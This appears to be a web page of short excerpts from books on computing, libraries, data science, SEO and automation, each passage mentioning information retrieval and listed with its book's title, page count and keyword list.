., 154 Borge, Jorge Luis, 9 borrowers ledgers, 52 Boston Athenaeum, 82, 107 Boston Public Library, 107, 147 Bowker, Richard Rogers, 87 Burch, Samuel, 48 C Cadell and Davies, 47 Caesar, Julius, 15 Callimachus, 14 Cataloging Distribution Service Division, 112, 146, 147 Catholic Church. See Roman Catholic Church census, 151 Centennial International Exhibition of 1876, 84 Ch’eng Ti, 15 Chicago Public Library, 7 Christianity, rise of, 15 clay, 12 Clemens, Samuel, 121 codex, 17 Cole, John, 87, 107 Collins, Billy, 156 Collyer, Homer, 148 Collyer, Langley, 148 Committee on Mechanized Information Retrieval, 152 computer punch cards, 151 Computing-Tabulating-Recording Company, 151 Congress Main Reading Room, 159 Copyright Act of 1870, 103 cross-referencing, 17 cuneiform, 12 Cutter, Charles Ammi, 82, 83, 108 D Dana, John, 146 Descartes, René, 19 Dewey Deciman Classification, 84 Dewey, Melville Louis, 82, 83, 85, 87, 107, 113, 151 Dixson, Kathy, 155 Diderot, Denis, 33 Douglass, Frederick, 102 Dove, Rita, 156 E Edlund, Paul, 112, 158 Eliot, T.


pages: 402 words: 110,972

Nerds on Wall Street: Math, Machines and Wired Markets by David J. Leinweber

AI winter, algorithmic trading, asset allocation, banking crisis, barriers to entry, Big bang: deregulation of the City of London, business cycle, butter production in bangladesh, butterfly effect, buttonwood tree, buy and hold, buy low sell high, capital asset pricing model, citizen journalism, collateralized debt obligation, corporate governance, Craig Reynolds: boids flock, creative destruction, credit crunch, Credit Default Swap, credit default swaps / collateralized debt obligations, Danny Hillis, demand response, disintermediation, distributed generation, diversification, diversified portfolio, Emanuel Derman, en.wikipedia.org, experimental economics, financial innovation, fixed income, Gordon Gekko, implied volatility, index arbitrage, index fund, information retrieval, intangible asset, Internet Archive, John Nash: game theory, Kenneth Arrow, load shedding, Long Term Capital Management, Machine translation of "The spirit is willing, but the flesh is weak." to Russian and back, market fragmentation, market microstructure, Mars Rover, Metcalfe’s law, moral hazard, mutually assured destruction, Myron Scholes, natural language processing, negative equity, Network effects, optical character recognition, paper trading, passive investing, pez dispenser, phenotype, prediction markets, quantitative hedge fund, quantitative trading / quantitative finance, QWERTY keyboard, RAND corporation, random walk, Ray Kurzweil, Renaissance Technologies, risk tolerance, risk-adjusted returns, risk/return, Robert Metcalfe, Ronald Reagan, Rubik’s Cube, semantic web, Sharpe ratio, short selling, Silicon Valley, Small Order Execution System, smart grid, smart meter, social web, South Sea Bubble, statistical arbitrage, statistical model, Steve Jobs, Steven Levy, Tacoma Narrows Bridge, the scientific method, The Wisdom of Crowds, time value of money, too big to fail, transaction costs, Turing machine, Upton Sinclair, value at risk, Vernor Vinge, yield curve, Yogi Berra, your tax dollars at work

Reporters were necessary intermediaries in an era when (for example) press releases were sent to a few thousand fax machines and assigned to reporters by editors, and when SEC filings were found on a shelf in the Commission’s reading rooms in major cities. Press releases go to everyone over the Web. SEC filings are completely electronic. The reading rooms are closed. There is a great deal of effort to develop persistent specialized information-retrieval software agents for these sorts of routine newsgathering activities, which in turn creates incentives for reporters to move up from moving information around to interpretation and analysis. Examples and more in-depth discussion on these “new research” topics are forthcoming in Chapters 9 and 10. 86 Nerds on Wall Str eet Innovative algo systems will facilitate the use of news, in processed and raw forms.

Dow Jones Elementized News Feed, www.djnewswires.com/us/djenf.htm. 26. Reuters Newscope algorithmic offerings, http://about.reuters.com/productinfo/ newsscoperealtime/index.aspx?user=1&. 27. These tools are called Open Calais (www.opencalais.com/). 28. For the technically ambitious reader, Lucene (http://lucene.apache.org/), Lingpipe (http://alias-i.com/lingpipe/), and Lemur (www.lemurproject.org/) are popular open source language and information retrieval tools. 29. Anthony Oettinger, a pioneer in machine translation at Harvard going back to the 1950s, told a story of an early English-Russian-English system sponsored by U.S. intelligence agencies. The English “The spirit is willing but the flesh is weak” went in, was translated to Russian, which was then sent in again to be translated back into English. The result: “The vodka is ready but the meat is rotten.”

Direct market access has disintermediated brokers, many of whom are now in other lines of work. Direct access to primary sources of financially relevant information is disintermediating reporters, who now have to provide more than just a conduit to earn their keep. We would be hard-pressed to find more innovation than we see today on the Web. Google Finance, Yahoo! Finance, and their brethren have made more advanced information retrieval and analysis tools available for free than could be purchased for any amount in the notso-distant past. Other new technologies enable a new level of human-machine collaboration in investment research, such as XML (extensible markup language), discussed in Chapter 2. One of this technology’s most vocal proponents is Christopher Cox, former chairman of the SEC, who has taken the lead in encouraging the adoption of XBRL (extensible Business Reporting Language) to keep U.S. markets, exchanges, companies, and investors ahead of the curve. 106 Nerds on Wall Str eet We constantly hear about information overload, information glut, information anxiety, data smog, and the like.


pages: 223 words: 52,808

Intertwingled: The Work and Influence of Ted Nelson (History of Computing) by Douglas R. Dechow

3D printing, Apple II, Bill Duvall, Brewster Kahle, Buckminster Fuller, Claude Shannon: information theory, cognitive dissonance, computer age, conceptual framework, Douglas Engelbart, Douglas Engelbart, Dynabook, Edward Snowden, game design, HyperCard, hypertext link, information retrieval, Internet Archive, Jaron Lanier, knowledge worker, linked data, Marc Andreessen, Marshall McLuhan, Menlo Park, Mother of all demos, pre–internet, RAND corporation, semantic web, Silicon Valley, software studies, Steve Jobs, Steve Wozniak, Stewart Brand, Ted Nelson, the medium is the message, Vannevar Bush, Wall-E, Whole Earth Catalog

Childress V (1998) Engineering problem solving for mathematics, science, and technology education. J Technol Educ 10(1). http://​scholar.​lib.​vt.​edu/​ejournals/​JTE/​v10n1/​childress.​html 5. Nelson TH (1965) A file structure for the complex, the changing and the indeterminate. In: Proceedings of the ACM 20th national conference. ACM Press, New York, pp 84–100 6. Nelson TH (1967) Getting it out of our system. In: Schlechter G (ed) Information retrieval: a critical review. Thompson Books, Washington, DC, pp 191–210 7. Nelson TH (1968) Hypertext implementation notes, 6–10 March 1968. Xuarchives. http://​xanadu.​com/​REF%20​XUarchive%20​SET%20​03.​11.​06/​hin68.​tif 8. Nelson TH (1974) Computer lib: you can and must understand computers now/dream machines. Hugo’s Book Service, Chicago 9. Nelson TH (1993) Literary machines. Mindful Press, Sausalito 10.

Ted signed my copy of Literary Machines [25] at a talk in the mid-1990s, thus I was in awe of the man when Bill Dutton put us together as visiting scholars in the OII attic, a wonderful space overlooking the Ashmolean Museum. Ted and I arrived at concepts of data and metadata from very different paths. He brought his schooling in the theater and literary theory to the pioneer days of personal computing. I brought my schooling in mathematics, information retrieval, documentation, libraries, and communication to the study of scholarship. While Ted was sketching personal computers to revolutionize written communication [24], I was learning how to pry data out of card catalogs and move them into the first generation of online catalogs [6]. Our discussions that began 30 years later revealed the interaction of these threads, which have since converged. 10.2 Collecting and Organizing Data Ted overwhelms himself in data, hence he needs metadata to manage his collections.

Paper presented to Sixth National Symposium on Information Display, Los Angeles, pp 31–39 *Nelson TH (1965) The hypertext. In: Proceedings of the World Documentation Federation Nelson TH (1966–1967) Hypertext notes. http://​web.​archive.​org/​web/​20031127035740/​http://​www.​xanadu.​com/​XUarchive/​. Unpublished series of ten short essays or “notes“ Nelson TH (1967) Getting it out of our system. In: Schechter G (ed) Information retrieval: a critical review. Thompson Books, Washington, DC, pp 191–210 Nelson TH, Carmody S, Gross W, Rice D, van Dam A (1969) A hypertext editing system for the/360. In: Faiman M, Nievergelt J (eds) Pertinent concepts in computer graphics. Proceedings of the Second University of Illinois conference on computer graphics. University of Illinois Press, Urbana, pp 291–330 Nelson TH (1970) Las Vegas confrontation sit-out: a CAI radical’s view from solitary.


pages: 371 words: 93,570

Broad Band: The Untold Story of the Women Who Made the Internet by Claire L. Evans

"side hustle", 4chan, Ada Lovelace, Albert Einstein, British Empire, colonial rule, computer age, crowdsourcing, dark matter, dematerialisation, Doomsday Book, Douglas Engelbart, Douglas Engelbart, Douglas Hofstadter, East Village, Edward Charles Pickering, game design, glass ceiling, Grace Hopper, Gödel, Escher, Bach, Haight Ashbury, Harvard Computers: women astronomers, Honoré de Balzac, Howard Rheingold, HyperCard, hypertext link, index card, information retrieval, Internet Archive, Jacquard loom, John von Neumann, Joseph-Marie Jacquard, knowledge worker, Leonard Kleinrock, Mahatma Gandhi, Mark Zuckerberg, Menlo Park, Mother of all demos, Network effects, old-boy network, On the Economy of Machinery and Manufactures, packet switching, pets.com, rent control, RFC: Request For Comment, rolodex, semantic web, Silicon Valley, Skype, South of Market, San Francisco, Steve Jobs, Steven Levy, Stewart Brand, subscription business, technoutopianism, Ted Nelson, telepresence, Whole Earth Catalog, Whole Earth Review, women in the workforce, Works Progress Administration, Y2K

With a couple of phones and boxes of index cards, it coordinated extensive group action for quick-response incidents like the 1971 San Francisco Bay oil spill—an early version of the kind of organizing that happens so easily today on social media. Resource One took up where these efforts left off, even inheriting the San Francisco Switchboard’s corporate shell. When Pam and the Chrises moved into the warehouse, their plan was to design a common information retrieval system for all the existing Switchboards in the city, interlinking their various resources into a database running on borrowed computer time. “Our vision was making technology accessible to people,” Pam explains. “It was a very passionate time. And we thought anything was possible.” But borrowing computer time to build such a database was far too limiting; if they were to imbue their politics into a computer system for the people, they’d need to build it from the ground up.

That summer, while the other communards plumbed the building’s twenty-foot hot tub, the Resource One group installed cabinet racks and drum storage units. Nobody on the job had done anything remotely like it—even the lead electrician learned as he went, and the software was written from scratch, encoding the counterculture’s values into the computer at an operating system level. The Resource One Generalized Information Retrieval System, ROGIRS, written by a hacker, Ephrem Lipkin, was designed for the underground Switchboards, as a way to manage the offerings of an alternative economy. Once up and running, the machine would become the heart of Northern California’s underground free-access network, a glimmer of the Internet’s vital cultural importance years before most people would ever hear of it. “At different points in your life, different things matter,” Pam says to me.

Bolton told them how social services agencies in the Bay Area didn’t share a citywide database for referral information; he’d personally observed how social workers at different agencies relied on their own Rolodexes. The quality of referrals they gave varied throughout the city, and people weren’t always connected to the services they needed, even if the services did exist. Chris Macie, who founded Resource One with Pam and stayed on after she left, programmed a new information retrieval system for the project, and the women started calling social workers all over San Francisco. If they kept an updated database of referral information, they asked, would the agencies be interested in subscribing? The answer was a resounding yes. The women of Resource One found their cause: using the computer to help the most disadvantaged people in the city gain access to services. Their Social Services Referral Directory succeeded where efforts to interlink Bay Area Switchboards had failed, and for a simple reason: it actually considered its users.


pages: 480 words: 99,288

Mastering ElasticSearch by Rafal Kuc, Marek Rogozinski

Amazon Web Services, create, read, update, delete, en.wikipedia.org, fault tolerance, finite state, full text search, information retrieval

Keep in mind, that in order to adjust your query relevance, you don't need to understand that, but it is very important to at least know how it works. The Lucene conceptual formula The conceptual version of the TF/IDF formula looks like: The previous presented formula is a representation of Boolean model of Information Retrieval combined with Vector Space Model of Information Retrieval. Let's not discuss it and let's just jump into the practical formula, which is implemented by Apache Lucene and is actually used. Note The information about Boolean model and Vector Space Model of Information Retrieval are far beyond the scope of this book. If you would like to read more about it, start with http://en.wikipedia.org/wiki/Standard_Boolean_model and http://en.wikipedia.org/wiki/Vector_Space_Model. The Lucene practical formula Now let's look at the practical formula Apache Lucene uses: As you may be able to see, the score factor for the document is a function of query q and document d.

He is also a speaker for various conferences around the world such as Lucene Eurocon, Berlin Buzzwords, ApacheCon, and Lucene Revolution. Rafał began his journey with Lucene in 2002 and it wasn't love at first sight. When he came back to Lucene in late 2003, he revised his thoughts about the framework and saw the potential in search technologies. Then Solr came and this was it. He started working with ElasticSearch in the middle of 2010. Currently, Lucene, Solr, ElasticSearch, and information retrieval are his main points of interest. Rafał is also an author of Solr 3.1 Cookbook, the update to it—Solr 4.0 Cookbook, and is a co-author of ElasticSearch Server all published by Packt Publishing. The book you are holding in your hands was something that I wanted to write after finishing the ElasticSearch Server book and I got the opportunity. I wanted not to jump from topic to topic, but concentrate on a few of them and write about what I know and share the knowledge.


pages: 660 words: 141,595

Data Science for Business: What You Need to Know About Data Mining and Data-Analytic Thinking by Foster Provost, Tom Fawcett

Albert Einstein, Amazon Mechanical Turk, big data - Walmart - Pop Tarts, bioinformatics, business process, call centre, chief data officer, Claude Shannon: information theory, computer vision, conceptual framework, correlation does not imply causation, crowdsourcing, data acquisition, David Brooks, en.wikipedia.org, Erik Brynjolfsson, Gini coefficient, information retrieval, intangible asset, iterative process, Johann Wolfgang von Goethe, Louis Pasteur, Menlo Park, Nate Silver, Netflix Prize, new economy, p-value, pattern recognition, placebo effect, price discrimination, recommendation engine, Ronald Coase, selection bias, Silicon Valley, Skype, speech recognition, Steve Jobs, supply-chain management, text mining, The Signal and the Noise by Nate Silver, Thomas Bayes, transaction costs, WikiLeaks

It may be used directly to find customers similar to a given customer. It forms the core of several prediction algorithms that estimate a target value such as the expected resouce usage of a client or the probability of a customer to respond to an offer. It is also the basis for clustering techniques, which group entities by their shared features without a focused objective. Similarity forms the basis of information retrieval, in which documents or webpages relevant to a search query are retrieved. Finally, it underlies several common algorithms for recommendation. A traditional algorithm-oriented book might present each of these tasks in a different chapter, under different names, with common aspects buried in algorithm details or mathematical propositions. In this book we instead focus on the unifying concepts, presenting specific tasks and algorithms as natural manifestations of them.

In set notation, the Jaccard distance metric is shown in Equation 6-4. Equation 6-4. Jaccard distance Cosine distance is often used in text classification to measure the similarity of two documents. It is defined in Equation 6-5. Equation 6-5. Cosine distance where ||·||2 again represents the L2 norm, or Euclidean length, of each feature vector (for a vector this is simply the distance from the origin). Note The information retrieval literature more commonly talks about cosine similarity, which is simply the fraction in Equation 6-5. Alternatively, it is 1 – cosine distance. In text classification, each word or token corresponds to a dimension, and the location of a document along each dimension is the number of occurrences of the word in that document. For example, suppose document A contains seven occurrences of the word performance, three occurrences of transition, and two occurrences of monetary.

True positive rate and False negative rate refer to the frequency of being correct and incorrect, respectively, when the instance is actually positive: TP/(TP + FN) and FN/(TP + FN). The True negative rate and False positive rate are analogous for the instances that are actually negative. These are often taken as estimates of the probability of predicting Y when the instance is actually p, that is p(Y|p), etc. We will continue to explore these measures in Chapter 8. The metrics Precision and Recall are often used, especially in text classification and information retrieval. Recall is the same as true positive rate, while precision is TP/(TP + FP), which is the accuracy over the cases predicted to be positive. The F-measure is the harmonic mean of precision and recall at a given point, and is: Practitioners in many fields such as statistics, pattern recognition, and epidemiology speak of the sensitivity and specificity of a classifier: You may also hear about the positive predictive value, which is the same as precision.


pages: 413 words: 119,587

Machines of Loving Grace: The Quest for Common Ground Between Humans and Robots by John Markoff

"Robert Solow", A Declaration of the Independence of Cyberspace, AI winter, airport security, Apple II, artificial general intelligence, Asilomar, augmented reality, autonomous vehicles, basic income, Baxter: Rethink Robotics, Bill Duvall, bioinformatics, Brewster Kahle, Burning Man, call centre, cellular automata, Chris Urmson, Claude Shannon: information theory, Clayton Christensen, clean water, cloud computing, collective bargaining, computer age, computer vision, crowdsourcing, Danny Hillis, DARPA: Urban Challenge, data acquisition, Dean Kamen, deskilling, don't be evil, Douglas Engelbart, Douglas Engelbart, Douglas Hofstadter, Dynabook, Edward Snowden, Elon Musk, Erik Brynjolfsson, factory automation, From Mathematics to the Technologies of Life and Death, future of work, Galaxy Zoo, Google Glasses, Google X / Alphabet X, Grace Hopper, Gunnar Myrdal, Gödel, Escher, Bach, Hacker Ethic, haute couture, hive mind, hypertext link, indoor plumbing, industrial robot, information retrieval, Internet Archive, Internet of things, invention of the wheel, Jacques de Vaucanson, Jaron Lanier, Jeff Bezos, job automation, John Conway, John Markoff, John Maynard Keynes: Economic Possibilities for our Grandchildren, John Maynard Keynes: technological unemployment, John von Neumann, Kevin Kelly, knowledge worker, Kodak vs Instagram, labor-force participation, loose coupling, Marc Andreessen, Mark Zuckerberg, Marshall McLuhan, medical residency, Menlo Park, Mitch Kapor, Mother of all demos, natural language processing, new economy, Norbert Wiener, PageRank, pattern recognition, pre–internet, RAND corporation, Ray Kurzweil, Richard Stallman, Robert Gordon, Rodney Brooks, Sand Hill Road, Second Machine Age, self-driving car, semantic web, shareholder value, side project, Silicon Valley, Silicon Valley startup, Singularitarianism, skunkworks, Skype, social software, speech recognition, stealth mode startup, Stephen Hawking, Steve Ballmer, Steve Jobs, Steve Wozniak, Steven Levy, Stewart Brand, strong AI, superintelligent machines, technological singularity, Ted Nelson, telemarketer, telepresence, telepresence robot, Tenerife airport disaster, The Coming Technological Singularity, the medium is the message, Thorstein Veblen, Turing test, Vannevar Bush, Vernor Vinge, Watson beat the top human players on Jeopardy!, Whole Earth Catalog, William Shockley: the traitorous eight, zero-sum game

Engelbart’s researchers, an eclectic collection of buttoned-down white-shirted engineers and long-haired computer hackers, were taking computing in a direction so different it was not even in the same coordinate system. The Shakey project was struggling to mimic the human mind and body. Engelbart had a very different goal. During World War II he had stumbled across an article by Vannevar Bush, who had proposed a microfiche-based information retrieval system called Memex to manage all of the world’s knowledge. Engelbart later decided that such a system could be assembled based on the then newly available computers. He thought the time was right to build an interactive system to capture knowledge and organize information in such a way that it would now be possible for a small group of people—scientists, engineers, educators—to create and collaborate more effectively.

In one sense the company began as the quintessential intelligence augmentation, or IA, company. The PageRank algorithm Larry Page developed to improve Internet search results essentially mined human intelligence by using the crowd-sourced accumulation of human decisions about valuable information sources. Google initially began by collecting and organizing human knowledge and then making it available to humans as part of a glorified Memex, the original global information retrieval system first proposed by Vannevar Bush in the Atlantic Monthly in 1945.11 As the company has evolved, however, it has started to push heavily toward systems that replace rather than extend humans. Google’s executives have obviously thought to some degree about the societal consequences of the systems they are creating. Their corporate motto remains “Don’t be evil.” Of course, that is nebulous enough to be construed to mean almost anything.

A student in computer science first at the State University of New York at Buffalo, he then entered graduate programs in computer science at both Washington University in St. Louis and Stanford, but dropped out of both programs before receiving an advanced degree. Once he was on the West Coast, he had gotten involved with Brewster Kahle’s Internet Archive Project, which sought to save a copy of every Web page on the Internet. Larry Page and Sergey Brin had given Hassan stock for programming PageRank, and Hassan also sold E-Groups, another of his information retrieval projects, to Yahoo! for almost a half-billion dollars. By then, he was a very wealthy Silicon Valley technologist looking for interesting projects. In 2006 he backed both Ng and Salisbury and hired Salisbury’s students to join Willow Garage, a laboratory he’d already created to facilitate the next generation of robotics technology—like designing driverless cars. Hassan believed that building a home robot was a more marketable and achievable goal, so he set Willow Garage to work designing a PR2 robot to develop technology that he could ultimately introduce into more commercial projects.


The Art of SEO by Eric Enge, Stephan Spencer, Jessie Stricchiola, Rand Fishkin

AltaVista, barriers to entry, bounce rate, Build a better mousetrap, business intelligence, cloud computing, dark matter, en.wikipedia.org, Firefox, Google Chrome, Google Earth, hypertext link, index card, information retrieval, Internet Archive, Law of Accelerating Returns, linked data, mass immigration, Metcalfe’s law, Network effects, optical character recognition, PageRank, performance metric, risk tolerance, search engine result page, self-driving car, sentiment analysis, social web, sorting algorithm, speech recognition, Steven Levy, text mining, web application, wikimedia commons

However, the search engines recognize an iframe or a frame used to pull in another site’s content for what it is, and therefore ignore the content inside the iframe or frame as it is content published by another publisher. In other words, they don’t consider content pulled in from another site as part of the unique content of your web page. Determining Searcher Intent and Delivering Relevant, Fresh Content Modern commercial search engines rely on the science of information retrieval (IR). This science has existed since the middle of the twentieth century, when retrieval systems powered computers in libraries, research facilities, and government labs. Early in the development of search systems, IR scientists realized that two critical components comprised the majority of search functionality: relevance and importance (which we defined earlier in this chapter). To measure these factors, search engines perform document analysis (including semantic analysis of concepts across documents) and link (or citation) analysis.

As far as the search engines are concerned, however, the text in a document—and particularly the frequency with which a particular term or phrase is used—has very little impact on how happy a searcher will be with that page. In fact, quite often a page laden with repetitive keywords in an attempt to please the engines will provide a very poor user experience; thus, although some SEO professionals today do claim to use term weight (a mathematical equation grounded in the real science of information retrieval) or other, more “modern” keyword text usage methods, nearly all optimization can be done very simply. The best way to ensure that you’ve achieved the greatest level of targeting in your text for a particular term or phrase is to use it in the title tag, in one or more of the section headings (within reason), and in the copy on the web page. Equally important is to use other related phrases within the body copy to reinforce the context and the relevance of your main phrase to the page.

Hiding content inside images isn’t generally advisable, though, as it can be impractical for alternative devices (mobile devices, in particular) and inaccessible to others (such as screen readers). Hiding text in Java applets As with text in images, the search engines cannot easily parse content inside Java applets. Using them as a tool to hide text would certainly be a strange choice, though. Forcing form submission Search engines will not submit HTML forms in an attempt to access the information retrieved from a search or submission. Thus, if you keep content behind a forced-form submission and never link to it externally, your content will remain out of the engines’ indexes (as Figure 6-43 demonstrates). Figure 6-43. Content that can only be accessed by submitting a form is unreadable by crawlers The problem comes when content behind forms earns links outside your control, as when bloggers, journalists, or researchers decide to link to the pages in your archives without your knowledge.


pages: 347 words: 97,721

Only Humans Need Apply: Winners and Losers in the Age of Smart Machines by Thomas H. Davenport, Julia Kirby

AI winter, Andy Kessler, artificial general intelligence, asset allocation, Automated Insights, autonomous vehicles, basic income, Baxter: Rethink Robotics, business intelligence, business process, call centre, carbon-based life, Clayton Christensen, clockwork universe, commoditize, conceptual framework, dark matter, David Brooks, deliberate practice, deskilling, digital map, disruptive innovation, Douglas Engelbart, Edward Lloyd's coffeehouse, Elon Musk, Erik Brynjolfsson, estate planning, fixed income, follow your passion, Frank Levy and Richard Murnane: The New Division of Labor, Freestyle chess, game design, general-purpose programming language, global pandemic, Google Glasses, Hans Lippershey, haute cuisine, income inequality, index fund, industrial robot, information retrieval, intermodal, Internet of things, inventory management, Isaac Newton, job automation, John Markoff, John Maynard Keynes: Economic Possibilities for our Grandchildren, John Maynard Keynes: technological unemployment, Joi Ito, Khan Academy, knowledge worker, labor-force participation, lifelogging, longitudinal study, loss aversion, Mark Zuckerberg, Narrative Science, natural language processing, Norbert Wiener, nuclear winter, pattern recognition, performance metric, Peter Thiel, precariat, quantitative trading / quantitative finance, Ray Kurzweil, Richard Feynman, risk tolerance, Robert Shiller, Robert Shiller, Rodney Brooks, Second Machine Age, self-driving car, Silicon Valley, six sigma, Skype, social intelligence, speech recognition, spinning jenny, statistical model, Stephen Hawking, Steve Jobs, Steve Wozniak, strong AI, superintelligent machines, supply-chain management, transaction costs, Tyler Cowen: Great Stagnation, Watson beat the top human players on Jeopardy!, Works Progress Administration, Zipcar

When a machine greatly augments your powers of information retrieval, as many information systems do, we would call that gaining a superpower. Indeed, in the Terminator film franchise, out of all the superhuman capabilities Skynet designed into its “cybernetic organisms,” the one filmgoers covet most is the instant pop-up retrieval of biographical information on any humans encountered. It was the inspiration, for example, for Google Glass, according to the technical lead on that product, Thad Starner.6 (And although we had to say Hasta la vista, baby, to that particular product, Google assures us it will be back.) When Tom wrote a book about knowledge workers a decade ago, there were already some examples of how empowering such information retrieval can be for them. He wrote in some detail, for example, about the idea of “computer-aided physician order entry,” particularly focusing on an example of this type of system at Partners HealthCare, a care network in Boston.

See also augmentation; specific professions augmentation and, 31–32, 62, 65, 74, 76, 100, 122, 139, 176, 185, 228, 234, 251 big-picture perspective and, 100 codified tasks and automation, 12–13, 14, 16–18, 19, 27–28, 30, 70, 139, 156, 167, 191, 204, 216, 246 creativity and, 120–21 defined, 5 demand peak, 6 deskilling and, 16 five options for, 76–77, 218, 232 (see also specific steps) how job loss happens, 23–24 information retrieval and, 65–66 lack of wage growth, 24 machine encroachment, 13, 24–25 political strategy to help, 239 roles better done by humans, 26–30 signs of coming automation, 19–22 Stepping In, post-automation work, 30–32 taking charge of destiny, 8–9 time frame for dislocation of, 24–26 who they are, 5–6 working hours of, 70 Kraft, Robert, 172–73 Krans, Mike, 102–3, 132, 134–35, 138 Kurup, Deepika, 164 Kurzweil, Ray, 36 labor unions, 1, 16, 25 Lacerte, 22 language recognition technologies, 39–40, 43, 44–45, 50, 53, 56, 212 natural language processing (NLP), 34, 37, 178 Lawton, Jim, 50, 182–83, 193 Learning by Doing (Bessen), 133, 233 legal field augmentation as leverage in, 68 automation (e-discovery), 13, 142–44, 145, 151 content analysis and automation, 20 narrow specializations, 159–60, 162 number of U.S. lawyers, 68 Stepping Up in, 93 Leibniz Institute for Astrophysics, 59 Levasseur, M.


pages: 331 words: 60,536

The Sovereign Individual: How to Survive and Thrive During the Collapse of the Welfare State by James Dale Davidson, Rees Mogg

affirmative action, agricultural Revolution, bank run, barriers to entry, Berlin Wall, borderless world, British Empire, California gold rush, clean water, colonial rule, Columbine, compound rate of return, creative destruction, Danny Hillis, debt deflation, ending welfare as we know it, epigenetics, Fall of the Berlin Wall, falling living standards, feminist movement, financial independence, Francis Fukuyama: the end of history, full employment, George Gilder, Hernando de Soto, illegal immigration, income inequality, informal economy, information retrieval, Isaac Newton, Kevin Kelly, market clearing, Martin Wolf, Menlo Park, money: store of value / unit of account / medium of exchange, new economy, New Urbanism, Norman Macrae, offshore financial centre, Parkinson's law, pattern recognition, phenotype, price mechanism, profit maximization, rent-seeking, reserve currency, road to serfdom, Ronald Coase, Sam Peltzman, school vouchers, seigniorage, Silicon Valley, spice trade, statistical model, telepresence, The Nature of the Firm, the scientific method, The Wealth of Nations by Adam Smith, Thomas L Friedman, Thomas Malthus, trade route, transaction costs, Turing machine, union organizing, very high income, Vilfredo Pareto

They may perform the whole operation from another jurisdiction where taxes are lower and courts do not honor exorbitant malpractice claims. Digital Lawyers 154 Before agreeing to perform an operation, the skilled surgeon will probably call upon a digital lawyer to draft an instant contract that specifies and limits liability based upon the size and characteristics of the tumor revealed in images displayed by the magnetic resonance machine. Digital lawyers will be information-retrieval systems that automate selection of contract provisions, employing artificial intelligence processes such as neural networks to customize private contracts to meet transnational legal conditions. Participants in most high-value or important transactions will not only shop for suitable partners with whom to conduct a business; they will also shop for a suitable domicile for their transactions.

Lifetime employment will disappear as "jobs" increasingly become tasks or "piece work" rather than positions within an organization. Control over economic resources will shift away from the state to persons of superior skills and intelligence, as it becomes increasingly easy to create wealth by adding knowledge to products. Many members of learned professions will be displaced by interactive information-retrieval systems. New survival strategies for persons of lower intelligence will evolve, involving greater concentration on development of leisure skills, sports abilities, and crime, as well as service to the growing numbers of Sovereign Individuals as income inequality within jurisdictions rises. Political systems that grew up at a time when there were rising returns to violence must undergo wrenching adjustments.

Rapidly changing technology is undermining the megapolitical basis of social and economic organization. As a consequence, broad paradigmatic understanding, or unspoken theories about the way the world works, are being antiquated more quickly than in the past. This increases the importance of the broad overview and diminishes the value of individual "facts" of the kind that are readily available to almost anyone with an information retrieval system. 3. The growing tribalization and marginalization of life have had a stunting effect on discourse, and even on thinking. Many people have consequently gotten into the habit of shying away from conclusions that are obviously implied by the facts at their disposal. A recent psychological study disguised as a public opinion poll showed that members of individual occupational groups were almost uniformly unwilling to accept any conclusion that implied a loss of income for them, no matter how airtight the logic supporting it.


Sorting Things Out: Classification and Its Consequences (Inside Technology) by Geoffrey C. Bowker

affirmative action, business process, corporate governance, Drosophila, information retrieval, loose coupling, Menlo Park, Mitch Kapor, natural language processing, Occam's razor, QWERTY keyboard, Scientific racism, scientific worldview, sexual politics, statistical model, Stephen Hawking, Stewart Brand, the built environment, the medium is the message, transaction costs, William of Occam

So one culture sees spirit possession as a valid cause of death , another ridicules this as superstition; one medical specialty sees cancer as a localized phenomenon to be cut out and stopped from spreading, another sees it as a disorder of the whole immune system that merely manifests in one location or another. The implications f(Jr both treatment and classification differ. Tryin g to encode both causes results in serious information retrieval problems . I n addition , classifications shift historically. I n Britain i n I 650 we find that 696 people died of being " aged" ; 3 1 succumbed to wolves, 9 to grief, and l 9 to " King's Evil . " " Mother" claimed 2 in I 647 but none in 1 65 0 , but in that year 2 were " smothered and stifled" (see figure 1 . 3 ) . Seven starved in 1 65 0 (Graunt 1 66 2 ) , but by 1 9;)() the W H O would make a distinctio n : i f an adult starved t o death i t was a misfor­ tune ; if a child starved , it was homicide.

) indexi­ cality: the 48 points were only recognized if they were at least 0.5 cun from a classic acupuncture point, where a cun is: "the distance between the interphalangeal creases of the patient's middle finger" (WHO 1 99 1 , 1 4 ) . Formal Classification The structural aspects of classification are themselves a technical spe­ cialty in information science, biology, and statistics, among other places . Information scientists design thesauri for information retrieval, valuing parsimony and accuracy of terms, and the overall stability of the system over long periods of time. For biologists the choice of structure reflects how one sees species and the evolutionary process. For transformed cladists and numerical taxonomists, no useful state­ ment about the past can be read out of their classifications; for evolu­ tionary taxonomists that is the very basis of their system.

Each time another developer describes yet another formalism for encoding medical knowledge, the number of incompatibilities among these different systems increases ex­ ponentially. ( Museu 1 992, 435) He points out that there is no clear relationship between " the Unified Medical Language System [UMLS] advanced by the National Library of Medicine and the Arden syntax proposed by the American Society for Testing and Materials as a standard for representing medical knowledge" (Musen 1 992, 436) . The lCD, he points out, originated as The Kindness of Strangers 69 a means for describing causes of death; a trace of its heritage is its continued difficulty with describing chronic as opposed to acute forms of disease. This is one basis for the temporal fault lines that emerge in its usage. The UMLS originated as a means of information retrieval (the MeSH scheme) and is not as sensitive to clinical conditions as it might be (Musen 1 992, 440) . The two basic problems for any overarching classification scheme in a rapidly changing and complex field can be described as follows. First, any classificatory decision made now might by its nature block off valuable future developments . If we decide that all instances of sudden infant death syndrome (SI DS) are to be placed into a single box (R95 in ICD - 1 0) , then we are not recording information that might be used by future researchers to distinguish possible multiple social or envi­ ronmental causes of SIDS.


pages: 32 words: 7,759

8 Day Trips From London by Dee Maldon

Doomsday Book, information retrieval, Isaac Newton, Stephen Hawking, the market place

8 Day Trips from London A simple guide for visitors who want to see more than the capital By Dee Maldon Bookline & Thinker Ltd Bookline & Thinker Ltd #231, 405 King’s Road London SW10 OBB www.booklinethinker.com Eight Days Out From London Copyright © Bookline & Thinker Ltd 2010 This book is a work of non-fiction A CIP catalogue record for this book is available from the British Library All rights reserved. No part of this work may be reproduced or stored in an information retrieval system without the express permission of the publisher ISBN: 9780956517715 Printed and bound by Lightning Source UK Book cover designed by Donald McColl Contents Bath Brighton Cambridge Canterbury Oxford Stonehenge Winchester Windsor Introduction Why take any day trips from London? After all London has so much to see and do. Who could ever be bored there? But escaping London is not about being bored.


pages: 379 words: 109,612

Is the Internet Changing the Way You Think?: The Net's Impact on Our Minds and Future by John Brockman

